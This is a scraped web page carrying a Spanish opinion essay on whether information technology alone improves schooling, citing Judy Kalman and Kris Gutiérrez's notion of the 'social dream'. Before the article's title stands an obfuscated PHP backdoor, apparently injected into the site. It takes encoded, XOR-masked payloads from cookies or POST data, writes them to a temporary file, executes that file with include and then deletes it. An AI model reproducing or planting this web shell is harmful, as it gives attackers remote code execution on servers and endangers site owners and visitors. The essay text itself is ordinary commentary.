$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> EL SUEÑO SOCIAL. – www.interferencechannel.com

EL SUEÑO SOCIAL.

Enrique Velasco Garibay

Enrique Velasco Garibay

Aceptamos sin discusión el discurso actual que nos dice que las nuevas tecnologías como las computadoras, las redes, las variadas aplicaciones, los innumerables programas, es decir las tecnologías de la información y la comunicación (TIC), por el sólo hecho de existir nos lanzarán al estrato de mejores alumnos y mejores maestros.

Admiración instantánea, reverencias sin sustento ni análisis para aplaudir a raudales entregas gubernamentales a las escuelas públicas, fotos, primeras páginas en los periódicos, aplausos y todos somos felices. Incluidos los que hicieron el negocito de la compra venta.

Pero más allá de ser mal pensantes, centrémonos en la premisa actual que supone que todo lo que se asoma en las pantallas es mejor que la lectura en páginas impresas y que seremos óptimos y modernos por el hecho de usar estas tecnologías. Pero he aquí la necia, virtuosa –que no virtual- contradicción. Contradicción que nos pone a pensar los pensamientos.

Hay sitios y blogs especializados que ayudan a los maestros y alumnos a usar las viejas técnicas para un aprendizaje eficaz, y no son otras que las viejas recomendaciones sensatas para mejorar el vocabulario, para aprender a usar correctamente la ortografía, para perderle la flojera al diccionario y hacernos de más palabras que amplíen nuestros entendimiento y hagan del mundo que nos rodea un lugar entendido. Escribir y volver a escribir las palabras complicadas y darles un contexto en las oraciones.

Cito tan sólo un blog, a manera de ejemplo, que puede apoyar en el proceso enseñanza-aprendizaje: http://goo.gl/GfwUEZ fue creado en el 2009, ofrece a los profesores de habla hispana materiales educativos para enseñar escritura, vocabulario y ortografía, entre otras materias, que nos presentan modelos basados en la repetición, prescripción y memorización. Métodos que hoy son despreciados por los mentores post-modernos.

Estamos de acuerdo en que los enfoques educativos se han revolucionado en los últimos 50 años. Hoy asisten al colegio muchos más niños y jóvenes, hay mayor equidad de género, los contenidos se han tenido que actualizar, la organización educativa hoy abarca más culturas y más extensas geografías, señala la investigadora del CINVESTAV, Judy Kalman.

Ya son muchas las investigaciones internacionales sobre educación que indican que el uso de las TIC, por el sólo hecho de usarlas, no trae aparejadas mejoras generales en el aprendizaje, en el desempeño académico o en las interrelaciones que se deben dar en el aula.

Experiencias concretas replantean y rediseñan el tipo de relaciones que los maestros deben propiciar entre los alumnos. Kris Gutiérrez, directora de un programa de la Universidad de California en Los Ángeles que prepara a estudiantes de comunidades agrícolas migrantes para entrar a la universidad, ha demostrado cómo lograr experiencias educativas que son innovadoras e inclusivas. Experiencias ricas para gente pobre  que no posee recursos tecnológicos.

Gutiérrez ha creado la noción del ‘Sueño Social’, término que retrata el proceso de imaginar el mundo que podría ser. En este proceso educativo señala el hecho de que ciertas prácticas educativas ponen límites a los alumnos y desgastan sus oportunidades para aprender. Entonces hay que reconstruirlas a partir del mismo proceso de aprendizaje, de pedagogías, de las relaciones en la escuela y lo que ella llama “los recursos culturales del pensamiento”.

No se trata neciamente de repudiar las nuevas tecnologías y ceñirnos a los viejos métodos de aprendizaje. Se debe impulsar el uso de las computadoras en los procesos de investigación y análisis dentro de los salones de clases, debe ser una herramienta para los docentes en el apoyo al diseño de actividades de aprendizaje.

Los cambios que ocurren en el transcurso educativo se deben al accionar de los docentes, a su pensamiento y reflexiones, al contacto e intercambio de ideas entre ellos y con los alumnos, más no a la tecnología en sí misma. La computadora enriquece estas posibilidades pero no las determina. El lápiz, el cuaderno, el libro y el pizarrón siguen siendo  elementos evolutivos que no se pueden sustituir u olvidar.

A manera de epílogo. Otro tema, de enorme relevancia que se debe revisar son las condiciones generales que rodean a los maestros: el currículo, la organización escolar, las condiciones laborales, las carencias materiales y la forma de evaluar a los alumnos y a los mismos profesores.

Son ellos quienes van a transformar a nuestros países, son la clave para generar los profundos cambios que requerimos como sociedad. Sin olvidar a la familia.♦

Comments are closed.